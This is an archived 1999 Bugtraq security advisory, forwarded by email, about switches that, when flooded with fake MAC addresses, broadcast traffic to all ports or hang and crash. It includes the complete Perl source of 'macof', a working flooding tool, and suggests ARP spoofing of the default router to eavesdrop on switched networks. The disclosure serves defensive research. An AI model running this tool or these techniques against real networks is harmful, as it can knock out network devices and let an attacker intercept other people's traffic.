Everhart, Glenn (FUSA) From: ian.vitek@INFOSEC.SE Sent: Wednesday, May 05, 1999 4:15 AM To: BUGTRAQ@NETSPACE.ORG Subject: Infosec.19990305.macof.a Infosec Security Vulnerability Report No: Infosec.19990305.macof.a ===================================== Vulnerability Summary --------------------- Problem: Due to limitation with ARP/MAC-tables; switches could start sending packages to all ports, other network devices could hang, crash or reboot if they receive lots of MAC-addresses. Threat: Someone could eavesdrop/sniff network connections over a switched network. Denial of service attacks on a local network. Platform: Verified a 3com Superstack Switch 3300 (3c16981 Hardware v.1 Software v.2.10). Very possible other network devices. Solution: There is no today known solution to the problem. Vulnerability Description ------------------------- Senario: Computer A talks with computer B. Computer C is running macof. Computer A, B and C are connected to the same 3com switch. When running macof ( http://quake.skif.net/RawIP/macof.html ), a perl-program included in the perl-module Raw:IP ( http://quake.skif.net/RawIP/ ), through a 3com Superstack Switch 3300 (3c16981 Hardware v.1 Software v.2.10) the switch starts to send all network packages from computer A to computer B and computer C. Solution -------- There is no today known solution to the problem. As a workaround for switches you could maybe, where available, lock a MAC-address to every port on the switch. Background: ----------- At DefCon VI there were discussions about switches. Some people acquire a switch because you could not eavesdrop a network connection over it. Someone told that if you send a special multicast to a switch you could spoof another switch and thereby should the switch start sending you network packages. In these attempts we discovered that you easily could spoof a MAC-address and thereby confuse a switch because the switch tries to remember which MAC-addresses is on each port. Because of some network packages goes to the spoofing MAC you get problems with the connections (resends). But what happens if the switch gets flooded with MAC-addresses? The switch just has a bound memory-space for the MAC-addresses on each port. What happens if this table gets full? After a few tests (with macof) we got different results depending on the brand of the switch. Some switches stopped working and other started to forward network traffic to wrong or all ports. The only scientific analysis is this one reported. This is a resource problem. 3com was informed about this problem 21/4 1999. macof is just one way to do it. We think that the best way to eavesdrop a connection over a switch is to spoof the default router and send ARP-redirects with your MAC-address as ?changing to? and route the incoming packages to the default routers MAC-address. //Ian Vitek ian.vitek@infosec.se Test program, macof: ------ #!/usr/bin/perl -w # # macof v. 1.1 # By Ian Vitek ( ian.vitek@infosec.se ) # Tests network devices by flooding local network with MAC-addresses. # # Needs Net::RawIP (http://quake.skif.net/RawIP) # Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z) # # Example: ./macof -e -n 1000000 # ./macof -r -n 1000000 # (run it several times) # # Warning: This program could cause serious problems on your network. # This program could hang, crash or reboot network devices. # Switches could start sending packages to all ports making it # possible to intercept network traffic. # # require 'getopts.pl'; use Net::RawIP; Getopts('hvrs:e:d:x:y:i:n:'); sub GenMAC { my $tmp_mac="00"; my $i=0; # generate random mac-address while($i++ < 5) { $tmp_mac.=":" . sprintf("%x",int rand 16); $tmp_mac.=sprintf("%x",int rand 16); } return($tmp_mac); } $a = new Net::RawIP; die "usage: $0 [options]\ \t-d dest_host\t\t(def:random)\ \t-s source_host\t\t(def:random)\ \t-v \t\t\tprints generated mac-addresses\ \t-r | -e dest_mac \trandomize or set destination mac address\ \t\t\t\tshould be in format ff:ff:ff:ff:ff:ff or host\ \t-x source_port\t\t(def:random)\ \t-y dest_port \t\t(def:random)\ \t-i interface \t\tset sending interface \t\t(def:eth0)\ \t-n times\t\tset number of times to send \t(def:1)\ \t-h this help\n" unless ( !$opt_h && !($opt_r && $opt_e) ); # set default values $opt_i=eth0 unless $opt_i; $opt_n=1 unless $opt_n; $s_host=$opt_s if $opt_s; $d_host=$opt_d if $opt_d; $s_port=$opt_x if $opt_x; $d_port=$opt_y if $opt_y; # choose network card if($opt_e) { $a->ethnew($opt_i, dest => $opt_e); } else { $a->ethnew($opt_i); } # Loop for($times=0; $times < $opt_n; $times++) { # Check if one or two mac-addresses should be generated $mac=&GenMAC; if($opt_r) { $d_mac=&GenMAC; print "$d_mac \t$mac\n" if($opt_v); # set mac-addresses $a->ethset(source => $mac, dest => $d_mac); } else { print "$mac\n" if($opt_v); # set mac-address $a->ethset(source => $mac); } # generate random source and destination ip-addresses $s_host=17000000+int rand 4261000000 unless $opt_s; $d_host=17000000+int rand 4261000000 unless $opt_d; # generate random source and dest ports $s_port=int rand 65535 unless $opt_x; $d_port=int rand 65535 unless $opt_y; # set network package $a->set({ip => {saddr => $s_host, daddr => $d_host}, tcp => {source => $s_port, dest => $d_port} }); # send $a->ethsend; }